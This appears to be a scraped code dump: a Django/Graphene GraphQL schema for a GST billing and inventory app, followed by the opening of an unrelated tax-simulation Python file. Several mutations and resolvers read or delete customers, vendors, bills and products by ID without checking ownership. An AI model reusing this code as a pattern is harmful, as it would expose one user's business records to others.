pdf.cell(40, 2*th, str(i.SGST),1,0,\"C\")\n pdf.cell(40, 2*th, str(i.total),1,0,\"C\")\n pdf.ln(2*th)\n pdf.set_font(\"Arial\",\"\",12)\n pdf.cell(315,2*th,str(\"Payment Mode : {}\".format(bill.payment_mode)),0,0,\"C\")\n pdf.set_font(\"Arial\",\"\",10)\n pdf.cell(100,2*th,str(\"Gross Amount\"),1,0,\"C\")\n pdf.set_font(\"Arial\",\"B\",10)\n pdf.cell(120,2*th,str(bill.gross_amount ),1,0,\"C\")\n pdf.ln(2*th)\n \n pdf.set_font(\"Arial\",\"\",10)\n pdf.cell(315,2*th,str(\"\"),0,0,\"L\")\n pdf.cell(100,2*th,str(\"CGST\"),1,0,\"C\")\n pdf.set_font(\"Arial\",\"B\",10)\n pdf.cell(120,2*th,str(bill.cgst ),1,0,\"C\")\n pdf.ln(2*th)\n\n pdf.set_font(\"Arial\",\"\",10)\n pdf.cell(315,2*th,str(\"\"),0,0,\"L\")\n pdf.cell(100,2*th,str(\"SGST\"),1,0,\"C\")\n pdf.set_font(\"Arial\",\"B\",10)\n pdf.cell(120,2*th,str(bill.sgst ),1,0,\"C\")\n pdf.ln(2*th)\n\n pdf.set_font(\"Arial\",\"\",10)\n pdf.cell(315,2*th,str(\"\"),0,0,\"L\")\n pdf.cell(100,2*th,str(\"Net Amount\"),1,0,\"C\")\n pdf.set_font(\"Arial\",\"B\",10)\n pdf.cell(120,2*th,str(bill.net_amount ),1,0,\"C\")\n pdf.ln(2*th)\n\n\n # pdf.cell(220,2*th,str(\"Gross Amount\"))\n pdf.output(\"{}.pdf\".format(bill.invoice_number))\n\n\n\ndef GenerateBill(gross,invoice_number,medicines,discount,cgst,total,bill,user):\n # print(\"invoice ...\")\n # print(invoice_number)\n template = get_template(\"x.html\")\n context = {\"gross\":gross,\"medicines\": medicines,\"discount\":discount,\"cgst\":cgst,\"sgst\":cgst,\"total\":total,\"invoice\":invoice_number,\"bill\":bill,\"user\":user}\n html = template.render(context)\n options = {\n 'page-size': 'A4',\n 'margin-top': '50px',\n 'margin-right': '50px',\n 'margin-bottom': '50px',\n 'margin-left': '50px',\n # 'orientation':'landscape'\n }\n\n\n\n\n pdfkit.from_string(html, '{}.pdf'.format(invoice_number),options=options)\n \n\n\n\n\nclass CreateBill(graphene.Mutation):\n class Arguments:\n # name = graphene.String(required = True)\n # age = graphene.String(required = True)\n # gender = graphene.String(required = True)\n customerId = graphene.ID(required = True)\n remarks = graphene.String(required = True)\n # productId = graphene.ID(required = True)\n payment_mode = graphene.String(required = True)\n billing_date = graphene.String(required = True)\n invoice_number = graphene.String(required = True)\n is_instant = graphene.Boolean(required = True)\n # taga = gra\n # payment = graphene.Float(required=True)\n # gst = graphene.Float(required = True)\n products = graphene.List(MInput)\n bill = graphene.Field(BillingNode)\n ledger = graphene.Field(LedgerNode)\n def mutate(self,info,payment_mode,billing_date,products,customerId,remarks,invoice_number,is_instant):\n # print(products[0])\n # user_id = from_global_id(user_id)[1]\n # name = name.replace(\" ({})\".format(age),\"\")\n\n # customer = Customer.objects.filter(name__iexact=name,age=12,sex=gender)\n # if customer:\n # user_id = customer[0]\n # else:\n # user_id = Customer.objects.create(name=name,age=age,sex=gender)\n\n user_id = from_global_id(customerId)[1]\n\n # inv_no = \n bill = Billing.objects.create( \n is_instant=is_instant, user_id=info.context.user.id, customer_id=user_id,payment_mode=payment_mode,billing_date=datetime.datetime.strptime(billing_date,\"%Y-%m-%d\")\n )\n # print(bill)\n if(is_instant):\n temp_bill = Billing.objects.filter(user_id = info.context.user.id).exclude(is_instant=False).exclude(id=bill.id)\n print(temp_bill)\n # Billing.objects.filter(user_id=1).exclude(is_instant=False) \n if(temp_bill):\n print(temp_bill)\n # print(temp_bill.order_by(\"-id\")[0].invoice_number_instant)\n # for i in temp_bill.order_by(\"-id\"):\n # print(i.invoice_number_instant)\n \n if(temp_bill.order_by(\"-id\")[0].invoice_number_instant):\n print(temp_bill.order_by(\"-id\")[0].invoice_number_instant)\n bill.invoice_number_instant = int(temp_bill.order_by(\"-id\")[0].invoice_number_instant) + 1\n else:\n bill.invoice_number_instant = 1\n else:\n bill.invoice_number_instant = 1\n\n else:\n bill.invoice_number = invoice_number\n\n gross = total = discount = cgst = 0.0\n\n for i in products:\n gross += i[\"price\"] * i[\"net\"]\n total += (i[\"price\"] * i[\"net\"]) #- (i[\"price\"]*i[\"qty\"] * i[\"discount\"]/100)\n # discount += i[\"price\"]*i[\"qty\"] * i[\"discount\"]/100\n cgst += i[\"price\"]*i[\"net\"] * 10 /100\n\n print(i)\n Sales_Product.objects.create(\n taga = i[\"taga\"],\n product_id = from_global_id(i[\"product_id\"])[1],\n product_name = i[\"name\"],\n lessm = float(i[\"less\"]),\n price = round(float(i[\"price\"]),2),\n # discount = round(float(i[\"discount\"])),\n grossm = float(i[\"grossm\"]),\n netm = float(i[\"net\"]),\n # expiry_date = datetime.datetime.strptime(i[\"expiry\"],\"%Y-%m-%d\"),\n CGST = round(float(i[\"price\"]) * float(i[\"net\"]) * float(10)/100/2,2),\n SGST = round(float(i[\"price\"]) * float(i[\"net\"]) * float(10)/100/2,2),\n total = round(float(i[\"net\"]) * float(i[\"price\"]),2), # - (i[\"price\"]*i[\"netm\"]*i[\"discount\"]/100),2),\n billing_id = bill.id,\n )\n # bill = Billing.objects.get(id=14)\n # print(gross)\n # print(discount)\n # print(cgst)\n # print(total)\n \n bill.gross_amount = round(gross,2)\n bill.discount =round(discount,2)\n bill.cgst = round(cgst/2,2)\n bill.sgst = round(cgst/2,2)\n bill.net_amount = round(total,2)\n # bill.save() \n \n # ParitalPayment.objects.create(paid=payment,outstanding=total-payment,bill_id = bill.id)\n\n # GenerateBill(gross,bill.invoice_number,Medicine.objects.filter(billing_id=bill.id),discount,cgst,total,bill,info.context.user)\n # generate_receipt(bill,Sales_Product.objects.filter(billing_id=bill.id),info.context.user)\n # pdfname = \"{}.pdf\".format(bill.invoice_number)\n # print(pdfname)\n # with open(pdfname,'rb') as pdf:\n # bill.invoice.save(pdfname,File(pdf),save=True)\n led = Ledgers.objects.create(sale_id = bill.id,user_id = info.context.user.id)\n bill.save()\n # ParitalPayment.objects.create(paid=payment,outstanding=total-payment,bill_id = bill.id)\n # os.remove(pdfname)\n return CreateBill(bill=bill,ledger=led)\n\n\n\nclass UpdatePersonal(graphene.Mutation):\n class Arguments:\n firstname = graphene.String(required=True)\n lastname = graphene.String(required=True)\n phone = graphene.String(required=True)\n email = graphene.String(required=True)\n user = graphene.Field(UserNode)\n def mutate(self,info,firstname,lastname,phone,email):\n userid = info.context.user.id\n user = User.objects.get(id=userid)\n user.first_name = firstname\n user.last_name = lastname\n user.email = email\n user.save()\n\n profile = Profile.objects.get(user_id = userid)\n profile.contact_number = phone\n profile.save()\n return UpdatePersonal(user=user)\n\nclass UpdateFirm(graphene.Mutation):\n class Arguments:\n firm_name = graphene.String(required=True)\n gst = graphene.String(required=True)\n # tin = graphene.String(required=True)\n user = graphene.Field(UserNode)\n def mutate(self,info,firm_name,gst):\n userid = info.context.user.id\n user = User.objects.get(id=userid)\n profile = Profile.objects.get(user_id = userid)\n profile.GST_no = gst\n # profile.TIN_no = tin\n profile.firm_name = firm_name\n profile.save()\n return UpdateFirm(user=user)\n\nclass UpdateAddress(graphene.Mutation):\n class Arguments:\n address = graphene.String(required=True)\n state = graphene.String(required=True)\n city = graphene.String(required=True)\n zipcode = graphene.String(required=True)\n user = graphene.Field(UserNode)\n def mutate(self,info,address,state,city,zipcode):\n userid = info.context.user.id\n user = User.objects.get(id=userid)\n profile = Profile.objects.get(user_id = userid)\n profile.address = address\n # profile.contact_number = phone\n profile.state = state\n profile.city = city\n profile.zipcode = zipcode\n profile.save()\n return UpdateAddress(user=user)\n\nclass UpdateBank(graphene.Mutation):\n class Arguments:\n account = graphene.String(required=True)\n # bank = graphene.String(required=True)\n name = graphene.String(required=True)\n bank_name = graphene.String(required=True)\n branch = graphene.String(required=True)\n ifsc_code = graphene.String(required=True)\n user = graphene.Field(UserNode)\n def mutate(self,info,account,name,bank_name,branch,ifsc_code):\n bank = Bank.objects.get(user_id = info.context.user.id)\n bank.account_no = account\n bank.name = name\n bank.branch = branch\n bank.bank_name = bank_name\n bank.ifsc_code = ifsc_code\n bank.save()\n return UpdateBank(user = info.context.user)\n\n\n\n\nclass UpdateUser(graphene.Mutation):\n class Arguments:\n gst = graphene.String(required=True)\n # tin = graphene.String(required=True)\n firm_name = graphene.String(required=True)\n address = graphene.String(required=True)\n state = graphene.String(required=True)\n city = graphene.String(required=True)\n zipcode = graphene.String(required=True)\n email = graphene.String(required=True)\n firstname = graphene.String(required=True)\n lastname = graphene.String(required=True)\n phone = graphene.String(required=True)\n \n user = graphene.Field(UserNode)\n def mutate(self,info,gst,firm_name,address,email,firstname,lastname,phone,state,city,zipcode):\n userid = info.context.user.id\n user = User.objects.get(id = userid)\n user.first_name = firstname\n user.last_name = lastname\n user.email = email\n user.save()\n \n profile = Profile.objects.get(user_id = userid)\n profile.GST_no = gst\n # profile.TIN_no = tin\n profile.address = address\n profile.contact_number = phone\n profile.state = state\n profile.city = city\n profile.zipcode = zipcode\n profile.save()\n return UpdateUser(user = user)\n\nclass UpdateCategory(graphene.Mutation):\n class Arguments:\n category = graphene.String(required=True)\n subcategory = graphene.String(required=True)\n gst = graphene.Float(required=True)\n hsn = graphene.String(required=True)\n\n isNew = graphene.Boolean()\n category = graphene.Field(CategoryNode)\n sub_category = graphene.Field(SubCategoryNode)\n def mutate(self,info,category,subcategory,gst,hsn):\n cat = Category.objects.filter(name__iexact=category)\n if(cat):\n cat = cat[0]\n sub = SubCategory.objects.filter(name__iexact=subcategory)\n if(sub):\n sub = sub[0]\n # print(sub.hsn)\n sub.hsn = hsn\n sub.GST = gst\n sub.save()\n return UpdateCategory(isNew = False,category = cat,sub_category=sub)\n else:\n sub = SubCategory.objects.create(name=subcategory,hsn=hsn,GST=gst,user_id=info.context.user.id,category_id=cat.id)\n return UpdateCategory(isNew = True,category=cat,sub_category=sub)\n # else:\n cat = Category.objects.create(name=category,user_id=info.context.user.id)\n sub = SubCategory.objects.create(name=subcategory,hsn=hsn,GST=gst,user_id=info.context.user.id,category_id=cat.id)\n return UpdateCategory(isNew = True,category=cat,sub_category=sub)\n\nclass DeleteSubCategory(graphene.Mutation):\n class Arguments:\n id = graphene.ID(required=True)\n success=graphene.Boolean()\n def mutate(self,info,id):\n SubCategory.objects.get(id=from_global_id(id)[1]).delete()\n return DeleteSubCategory(success=True)\n\nclass UpdateSubCategory(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=False)\n category = graphene.String(required=False)\n is_update = graphene.Boolean(required=True) \n hsn = graphene.String(required=True)\n gst = graphene.Int(required=True)\n name = graphene.String(required=True)\n success = graphene.Boolean()\n sub_category = graphene.Field(SubCategoryNode)\n\n def mutate(self,info,is_update,hsn,gst,name,id=None,category=None):\n if(is_update is False):\n sub = SubCategory.objects.create(name=name,GST=gst,hsn=hsn,user_id=info.context.user.id,category_id=from_global_id(category)[1])\n return UpdateSubCategory(sub_category=sub,success=True)\n else:\n sub = SubCategory.objects.get(id=from_global_id(id)[1])\n sub.name = name\n sub.GST = gst\n sub.hsn = hsn\n sub.save()\n return UpdateSubCategory(sub_category=sub,success=True)\n\n\nclass RenameCategory(graphene.Mutation):\n class Arguments:\n id = graphene.ID(required=True)\n name = graphene.String(required=False)\n is_update = graphene.Boolean(required=True)\n\n success = graphene.Boolean()\n category = graphene.Field(CategoryNode)\n\n def mutate(self,info,id,is_update,name=None):\n if(is_update is True):\n c = Category.objects.get(id=from_global_id(id)[1])\n c.name = name\n c.save()\n return RenameCategory(success=True,category=c)\n else:\n Category.objects.get(id=from_global_id(id)[1]).delete()\n return RenameCategory(success=True)\nclass CreateVendor(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=True)\n name = graphene.String(required=True)\n mobile = graphene.String(required=True)\n gst = graphene.String(required=True)\n address = graphene.String(required=True)\n city = graphene.String(required=True)\n state = graphene.String(required=True)\n zipcode = graphene.String(required=True)\n company = graphene.String(required=True)\n email = graphene.String(required=True)\n is_new = graphene.Boolean(required=True)\n\n vendor = graphene.Field(VendorNode)\n def mutate(self,info,id,name,mobile,gst,address,city,state,zipcode,company,email,is_new):\n if(is_new is True):\n vendor = Vendor.objects.create(name=name,mobile=mobile,email=email, gst=gst,address=address ,state_id=from_global_id(state)[1],city_id=from_global_id(city)[1],zip_code=zipcode,company=company,user_id=info.context.user.id)\n else:\n vendor = Vendor.objects.get(id = from_global_id(id)[1])\n vendor.name = name\n vendor.mobile = mobile\n vendor.email = email\n vendor.gst = gst\n vendor.address = address\n vendor.state_id = from_global_id(state)[1]\n vendor.city_id = from_global_id(city)[1]\n vendor.zip_code = zipcode\n vendor.company = company\n vendor.save()\n return CreateVendor(vendor = vendor)\n\n\n\nclass CreateCustomer(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=True)\n name = graphene.String(required=True)\n mobile = graphene.String(required=True)\n gst = graphene.String(required=True)\n address = graphene.String(required=True)\n state = graphene.String(required=True)\n city = graphene.String(required=True)\n addhar = graphene.String(required=True)\n email = graphene.String(required=True)\n is_new = graphene.Boolean(required=True)\n zipcode = graphene.String(required=True)\n company = graphene.String(required=True)\n customer = graphene.Field(CustomerNode)\n def mutate(self,info,id,name,mobile,gst,address,email,is_new,state,city,addhar,zipcode,company):\n if(is_new is True):\n customer = Customer.objects.create(name=name,city=city,state=state,addhar_no=addhar ,mobile=mobile,gst_number=gst,address=address,email=email,user_id = info.context.user.id,company=company,zipcode=zipcode)\n # return CreateCustomer(customer = customer)\n else:\n customer = Customer.objects.get(id = from_global_id(id)[1])\n customer.name = name\n customer.mobile = mobile\n customer.gst_number = gst\n customer.email = email\n customer.address = address\n customer.city = city\n customer.state = state\n customer.addhar_no = addhar\n customer.zipcode = zipcode\n customer.company = company\n customer.save()\n return CreateCustomer(customer = customer)\n\n\n\nclass CreateCategory(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n category = graphene.Field(CategoryNode)\n def mutate(self,info,name):\n print(info.context.user.id)\n category = Category.objects.create(name=name,user_id = info.context.user.id)\n return CreateCategory(category = category)\n\nclass DeleteCustomer(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=True)\n success = graphene.Boolean()\n def mutate(self,info,id):\n Customer.objects.get(id=from_global_id(id)[1]).delete()\n return DeleteCustomer(success=True)\n\nclass DeleteVendor(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=True)\n success = graphene.Boolean()\n def mutate(self,info,id):\n Vendor.objects.get(id=from_global_id(id)[1]).delete()\n return DeleteVendor(success=True)\n\nclass DeleteProduct(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=True)\n success = graphene.Boolean()\n def mutate(self,info,id):\n Product.objects.get(id=from_global_id(id)[1]).delete()\n return DeleteProduct(success = True)\n\nclass AddPurchasePayment(graphene.Mutation):\n class Arguments:\n paid = graphene.Float(required=True)\n vendor_id = graphene.ID(required=True)\n date = graphene.String(required=True)\n outstanding = graphene.Float(required=True)\n mode = graphene.String(required=True)\n success = graphene.Boolean()\n partial = graphene.Field(PartialPaymentNode)\n def mutate(self,info,paid,vendor_id,date,outstanding,mode):\n p = ParitalPayment.objects.create(mode=mode, vendor_id = from_global_id(vendor_id)[1],date = datetime.datetime.strptime(date,\"%Y-%m-%d\"),paid=paid,outstanding=outstanding,user_id = info.context.user.id)\n # p = ParitalPayment.objects.all()[::-1][0]\n return AddPurchasePayment(success=True,partial = p)\n\nclass AddCustomerOutStanding(graphene.Mutation):\n class Arguments:\n outstanding = graphene.Float()\n customer_id = graphene.ID(required=True)\n customer = graphene.Field(CustomerNode)\n def mutate(self,info,outstanding,customer_id):\n c = Customer.objects.get(id=from_global_id(customer_id)[1])\n c.outstanding_add = 1\n out = CSales.objects.filter(customer_id = from_global_id(customer_id)[1])\n # print(out)\n if(out):\n # print()\n out[0].sales = outstanding + out[0].sales if out[0].sales else outstanding\n out[0].save()\n else:\n CSales.objects.create(customer_id = from_global_id(customer_id)[1],sales = outstanding,user_id=info.context.user.id)\n c.save()\n return AddCustomerOutStanding(customer = c)\n \n\nclass AddVendorOutStanding(graphene.Mutation):\n class Arguments:\n outstanding = graphene.Float()\n vendor_id = graphene.ID(required=True)\n vendor = graphene.Field(VendorNode)\n def mutate(self,info,outstanding,vendor_id):\n c = Vendor.objects.get(id=from_global_id(vendor_id)[1])\n c.outstanding_add = 1\n out = VPurchase.objects.filter(vendor_id = from_global_id(vendor_id)[1])\n # print(out)\n if(out):\n # print()\n out[0].purchase = outstanding + out[0].purchase if out[0].purchase else outstanding\n out[0].save()\n else:\n VPurchase.objects.create(vendor_id = from_global_id(vendor_id)[1],purchase = outstanding,user_id=info.context.user.id)\n c.save()\n return AddVendorOutStanding(vendor = c) \n\nclass AddSalesPayment(graphene.Mutation):\n class Arguments:\n paid = graphene.Float(required=True)\n customer_id = graphene.ID(required=True)\n date = graphene.String(required=True)\n outstanding = graphene.Float(required=True)\n mode = graphene.String(required=True)\n success = graphene.Boolean()\n partial = graphene.Field(PartialPaymentNode)\n def mutate(self,info,paid,customer_id,date,outstanding,mode):\n p = ParitalPayment.objects.create(user_id=info.context.user.id, mode=mode,customer_id = from_global_id(customer_id)[1],date = datetime.datetime.strptime(date,\"%Y-%m-%d\"),paid=paid,outstanding=outstanding)\n # p = ParitalPayment.objects.all()[::-1][0]\n return AddSalesPayment(success=True,partial = p)\n\nclass CreateUser(graphene.Mutation):\n # user = graphene.Field(UserNode)\n class Arguments:\n username = graphene.String(required=True)\n password = graphene.String(required=True)\n email = graphene.String(required=True)\n firstname = graphene.String(required=True)\n lastname = graphene.String(required=True)\n phone = graphene.String(required=True)\n\n gst = graphene.String(required=True)\n # tin = graphene.String(required=True)\n firm_name = graphene.String(required=True)\n address = graphene.String(required=True)\n\n user = graphene.Field(UserNode)\n def mutate(self,info,username,password,email,firstname,lastname,gst,firm_name,address,phone):\n user = get_user_model()(username = username,email = email,first_name = firstname,last_name=lastname)\n user.set_password(password)\n user.save()\n Profile.objects.create(user_id = user.id,GST_no = gst,firm_name=firm_name,address=address,contact_number=phone)\n Bank.objects.create(user_id = user.id)\n return CreateUser(user=user)\n\nimport graphql_jwt\n\nclass Mutation(graphene.ObjectType):\n create_user = CreateUser.Field()\n create_product = CreateProduct.Field()\n delete_product = DeleteProduct.Field()\n delete_customer = DeleteCustomer.Field()\n delete_vendor = DeleteVendor.Field()\n generate_bill = CreateBill.Field()\n update_bank = UpdateBank.Field()\n update_user = UpdateUser.Field()\n update_address = UpdateAddress.Field()\n update_firm = UpdateFirm.Field()\n update_personal = UpdatePersonal.Field()\n # create_user = CreateUser.Field()\n update_category = UpdateCategory.Field()\n rename_category = RenameCategory.Field()\n token_auth = graphql_jwt.ObtainJSONWebToken.Field()\n update_subcategory = UpdateSubCategory.Field()\n delete_subcategory = DeleteSubCategory.Field()\n create_category = CreateCategory.Field()\n create_customer = CreateCustomer.Field()\n create_vendor = CreateVendor.Field()\n add_purchase = AddPurchase.Field()\n add_sales_payment = AddSalesPayment.Field()\n add_purchase_payment = AddPurchasePayment.Field()\n add_customer_out_standing = AddCustomerOutStanding.Field()\n add_vendor_out_standing = AddVendorOutStanding.Field()\n \n\nclass Query(graphene.AbstractType):\n customers = DjangoFilterConnectionField(CustomerNode,search=graphene.String())\n customers_by_company = DjangoFilterConnectionField(CSalesNode,search=graphene.String())\n vendor_by_company = DjangoFilterConnectionField(VPurchaseNode,search=graphene.String())\n customer = graphene.Field(CustomerNode,id=graphene.ID())\n vendor = graphene.Field(VendorNode,id=graphene.ID())\n all_products = DjangoFilterConnectionField(ProductNode,search=graphene.String())\n product_by_id = graphene.Field(ProductNode,id=graphene.ID())\n product_suggestion = graphene.List(ProductNode,suggestion=graphene.String())\n category_suggestion = graphene.List(CategoryNode,suggestion=graphene.String())\n report = DjangoFilterConnectionField(BillingNode,min=graphene.String(),max=graphene.String())\n history = DjangoFilterConnectionField(BillingNode,slug=graphene.String(),is_instant=graphene.Boolean())\n subcategoy = DjangoFilterConnectionField(SubCategoryNode,id = graphene.ID(),search=graphene.String())\n user = graphene.Field(UserNode)\n customer_suggestion = DjangoFilterConnectionField(CustomerNode,suggestion = graphene.String())\n\n categories = DjangoFilterConnectionField(CategoryNode,search=graphene.String())\n vendors = DjangoFilterConnectionField(VendorNode,search=graphene.String())\n vendors_search = DjangoFilterConnectionField(VendorNode,search=graphene.String())\n states = DjangoFilterConnectionField(StateNode)\n city = DjangoFilterConnectionField(CityNode,stateId = graphene.ID())\n purchases = DjangoFilterConnectionField(PurchaseNode,slug=graphene.String())\n purchaseProduct = DjangoFilterConnectionField(PurchaseProductNode,purchaseId=graphene.ID())\n dashboard = graphene.Field(Dashboard)\n last_number = graphene.Field(InvoiceNumber,id=graphene.String())\n ledgers = DjangoFilterConnectionField(LedgerNode,search=graphene.String())\n bank_by_customer = DjangoFilterConnectionField(CustomerNode,search=graphene.String())\n all_payment = DjangoFilterConnectionField(PartialPaymentNode,search=graphene.String())\n # invoiceNumner = graphene\n # bank_by_vendor = DjangoFilterConnectionField(VendorNode,search=graphene.String())\n # ledgers = graphene.\n\n# 9899200257\n\n\n def resolve_all_payment(self,info,search,**kwargs):\n return ParitalPayment.objects.filter(Q(vendor__company__icontains=search) | Q(customer__company__icontains=search)).filter(user_id = info.context.user.id).order_by(\"-id\")\n\n def resolve_bank_by_customer(self,info,search,**kwargs):\n return Customer.objects.all()\n\n\n def resolve_ledgers(self,info,search,**kwargs):\n\n # return Ledgers.objects.filter(user_id=info.context.user.id).order_by(\"-id\")\n return Ledgers.objects.filter(Q(sale__customer__company__icontains=search) |Q(purchase__vendor__company__icontains=search) | Q(sale__invoice_number__icontains=search) |Q(purchase__invoice_number__icontains=search) | Q(sale__net_amount__icontains=search) |Q(purchase__total_bill__icontains=search)).order_by(\"-id\")\n \n def resolve_last_number(self,info,id):\n print(id)\n if(id):\n if(Billing.objects.filter(invoice_number=id).filter(user_id=info.context.user.id)).filter(is_instant=False):\n return {\"exist\":True,\"last_number\":0}\n else:\n return {\"exist\":False,\"last_number\":0}\n else:\n bill = Billing.objects.filter(user_id=info.context.user.id).filter(is_instant=False)\n if(bill):\n \n # num = int(bill[::-1][0].invoice_number) + 1\n num = int(bill.order_by(\"-id\")[0].invoice_number) + 1\n\n return {\"last_number\":num,\"exist\":False}\n else:\n return {\"last_number\":1,\"exist\":False}\n\n\n def resolve_dashboard(self,info):\n sales=0\n \n for i in Billing.objects.filter(user_id=info.context.user.id):\n sales=sales+i.net_amount\n purchase = 0\n for i in Purchase.objects.filter(user_id=info.context.user.id):\n purchase += i.total_bill if i.total_bill else 0\n \n return {\"sales\":sales,\"purchase\":purchase}\n\n def resolve_vendors_search(self,info,search,**kwargs):\n \n data = Vendor.objects.filter(Q(name__icontains=search) | Q(company__icontains=search) | Q(email__icontains=search) | Q(city__name__icontains=search) | Q(state__name__icontains=search) | Q(mobile__icontains=search)).filter(user=info.context.user.id)\n return data\n # print(data)\n # return Vendor.objects.all()\n\n def resolve_purchaseProduct(self,info,purchaseId,**kwargs):\n return PurchaseProduct.objects.filter(purchase__id = from_global_id(purchaseId)[1])\n\n\n def resolve_city(self,info,stateId):\n return City.objects.filter(state_id=from_global_id(stateId)[1])\n\n def resolve_vendors(self,info,search,**kwargs):\n return Vendor.objects.filter(Q(name__icontains=search) | Q(company__icontains=search) | Q(email__icontains=search) | Q(city__name__icontains=search) | Q(state__name__icontains=search) | Q(mobile__icontains=search)).filter(user_id=info.context.user.id)\n # return Vendor.objects.filter(user_id = info.context.user.id)\n\n def resolve_customer(self,info,id):\n return Customer.objects.get(id=from_global_id(id)[1])\n \n def resolve_vendor(self,info,id):\n return Vendor.objects.get(id=from_global_id(id)[1])\n\n def resolve_customers(self,info,search,**kwargs):\n return Customer.objects.filter(Q(name__icontains=search) | Q(email__icontains=search) | Q(mobile__icontains=search) | Q(gst_number__icontains=search) | Q(address__icontains=search)).filter(user_id=info.context.user.id)\n\n def resolve_vendor_by_company(self,info,search,**kwargs):\n return VPurchase.objects.filter(vendor__company__icontains=search).filter(user_id=info.context.user.id)\n\n def resolve_customers_by_company(self,info,search,**kwargs):\n return CSales.objects.filter(customer__company__icontains=search).filter(user_id=info.context.user.id)\n\n # return Customer.objects.filter(Q(name__icontains=search) | Q(company__icontains=search) ).filter(user_id=info.context.user.id).filter(outstanding_add=False)\n\n\n\n def resolve_customer_suggestion(self,info,suggestion,**kwargs):\n return Customer.objects.filter(company__icontains=suggestion).filter(user_id=info.context.user.id)\n # def resolve_customers(self,info):\n # return Customer.objects.filter(user_id=info.context.user.id)\n\n def resolve_subcategoy(self,info,id,search,**kwargs):\n return SubCategory.objects.filter(category_id=from_global_id(id)[1]).filter(Q(name__icontains=search))\n \n\n def resolve_user(self,info):\n # print(\"..user..\")\n # user_id = info.context.user.id\n print(info.context.user)\n return User.objects.get(id = info.context.user.id)\n\n # def resol\n\n # def resolve_history(self,info,*args):\n # return Billing.objects.all()\n def resolve_history(self,info,slug,is_instant,**kwargs):\n if(not len(slug)):\n return Billing.objects.filter(is_instant=is_instant)\n\n if(Billing.objects.filter(invoice_number__iexact=slug).filter(is_instant=is_instant)):\n return Billing.objects.filter(invoice_number__iexact=slug).filter(is_instant=is_instant)\n \n return Billing.objects.filter(customer__name__iexact=slug).filter(is_instant=is_instant)\n \n def resolve_purchases(self,info,slug,**kwargs):\n if(not len(slug)):\n return Purchase.objects.all().order_by(\"-id\")\n\n if(Purchase.objects.filter(invoice_number__iexact=slug)):\n return Purchase.objects.filter(invoice_number__iexact=slug).order_by(\"-id\")\n \n return Purchase.objects.filter(vendor__name__iexact=slug).order_by(\"-id\")\n\n \n # else if(Billing.objects.filter(patient__name__iexact=\"aman\"))\n\n def resolve_categories(self,info,search,**kwargs):\n \n # return Category.objects.filter(user_id = info.context.user.id)\n return Category.objects.filter(Q(name__icontains=search)).filter(user_id=info.context.user.id)\n\n def resolve_report(self,info,min,max):\n return Billing.objects.filter(billing_date__range=[min,max]).order_by('-id')\n\n def resolve_category_suggestion(self,info,suggestion):\n return Category.objects.filter(name__icontains=suggestion)\n def resolve_product_suggestion(self,info,suggestion):\n # return Product.objects.all()\n return Product.objects.filter(name__icontains=suggestion).filter(user_id=info.context.user.id)\n\n def resolve_all_products(self,info,search,**kwargs):\n # print(info.context.user)\n\n return Product.objects.filter(Q(name__icontains=search) | Q(mfg__icontains=search) | Q(mrp__icontains=search) | Q(price__icontains=search)).filter(user_id=info.context.user.id)\n\n # return Product.objects.all()\n \n def resolve_product_by_id(self,info,id):\n print(from_global_id(id)[1])\n return Product.objects.get(id=from_global_id(id)[1])\n \n def resolve_all_customer(self,info,**kwargs):\n return Customer.objects.all()\n","repo_name":"nixistechnologies/BACARDI","sub_path":"backend/app/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":50713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39677250475","text":"import numpy as np\nfrom srd import federal, oas, quebec, ontario, payroll, assistance, covid, ei, Person, Hhold, Dependent\nfrom itertools import product\nimport pandas as pd\nfrom multiprocessing import cpu_count, Pool\n\n\nclass tax:\n \"\"\"\n Classe générale pour le calcul des impôts, cotisations et prestations.\n\n Parameters\n ----------\n year: int\n année pour le calcul\n ifed: boolean\n vrai si le calcul de l'impôt fédéral est demandé\n ioas: boolean\n vrai si le calcul des prestations de PSV, SRG, Allocation et Allocation au survivant est demandé\n iprov: boolean\n vrai si le calcul de l'impôt provincial est demandé\n ipayroll: boolean\n vrai si le calcul des cotisations sociales est demandé\n iass: boolean\n vrai si le calcul des prestations d'aide sociale est demandé\n \"\"\"\n def __init__(self, year, ifed=True, ioas=True, iprov=True,\n ipayroll=True, iass=True):\n self.year = year\n self.ifed = ifed\n self.iprov = iprov\n self.ipayroll = ipayroll\n self.ioas = ioas\n self.iass = iass\n\n if ipayroll:\n self.payroll = payroll(year)\n if year == 2020 or year == 2021:\n self.covid = covid.program(year)\n self.ei = ei.program(year)\n if ifed:\n self.federal = federal.form(year)\n if iprov:\n self.prov = {'qc': quebec.form(year),\n 'on': ontario.form(year)}\n if ioas:\n self.oas = oas.program(year, self.federal)\n if iass:\n self.ass = assistance.program(year)\n\n def compute(self, hh, n_points=1):\n \"\"\"\n Cette fonction transfère des revenus de pension pour les couples admissibles\n et retient la solution qui maximise le revenu disponible familial.\n Si n_points=0, pas de fractionnement des revenus de pension. Par défaut\n (n_points=1), les revenus bruts sont égalisés dans la mesure des transferts\n possibles. Pour n>1, une simulation est faite pour chaque point de la grille.\n À noter que lorsque n augmente, les solutions avec n inférieur (notamment n=0)\n sont aussi considérées.\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n n_points: int\n nombre de points utilisés pour optimiser le fractionnement de revenus de\n pension\n \"\"\"\n if not hh.elig_split or (n_points == 0):\n self.compute_all(hh)\n return hh\n\n hh.copy()\n self.compute_all(hh)\n\n if hh.elig_split and n_points > 0:\n fam_disp_inc_max, transfer_max = hh.fam_disp_inc, 0\n\n desired_transfer = (hh.sp[0].inc_tot - hh.sp[1].inc_tot) / 2\n transfer = np.clip(desired_transfer, - hh.sp[1].max_split,\n hh.sp[0].max_split)\n self.compute_with_transfer(hh, transfer)\n\n if hh.fam_disp_inc > fam_disp_inc_max:\n fam_disp_inc_max, transfer_max = hh.fam_disp_inc, transfer\n\n if n_points > 1:\n grid_transfers = np.linspace(hh.sp[1].max_split,\n hh.sp[0].max_split, n_points-1)\n for transfer in grid_transfers:\n self.compute_with_transfer(hh, transfer)\n if hh.fam_disp_inc > 